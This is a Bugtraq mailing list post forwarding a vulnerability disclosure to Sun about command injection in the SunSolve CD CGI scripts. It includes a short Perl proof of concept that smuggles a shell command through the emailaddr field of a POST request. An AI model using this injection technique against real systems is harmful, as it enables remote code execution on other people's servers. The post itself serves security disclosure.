Bugtraq mailing list archives
SunSolve CD cgi scripts...
From: Fyodor <fyarochkin () trusecure com>
Date: Mon, 11 Mar 2002 12:46:06 +0700
Sun never responded to this mail so I guess they don't consider the bug too be serious ... could be worth mentioning though. ----- Forwarded message from Fyodor <fyodor () relaygroup com> ----- Date: Sat, 16 Jun 2001 23:24:45 +0700 From: Fyodor <fyodor () relaygroup com> To: security-alert () sun com Subject: SunSolve CD security problems.. Hey folks, while playing with Sunsolve CD cgi scripts we found quite a few user input validation problems which may pose security risks (remote code execution). Here's a perl script to test it quickly: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); ua = new LWP::UserAgent; $ua->agent("Scrapers"); my $req = POST 'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl', [ step => "submit" , emailaddr => "foo\@bar.com| id > /tmp/foo|"]; $res = $ua->request($req); print $res->as_string; print "code", $res->code, "\n"; cheers, -Fyodor ----- End forwarded message -----
Current thread:
- SunSolve CD cgi scripts... Fyodor (Mar 12)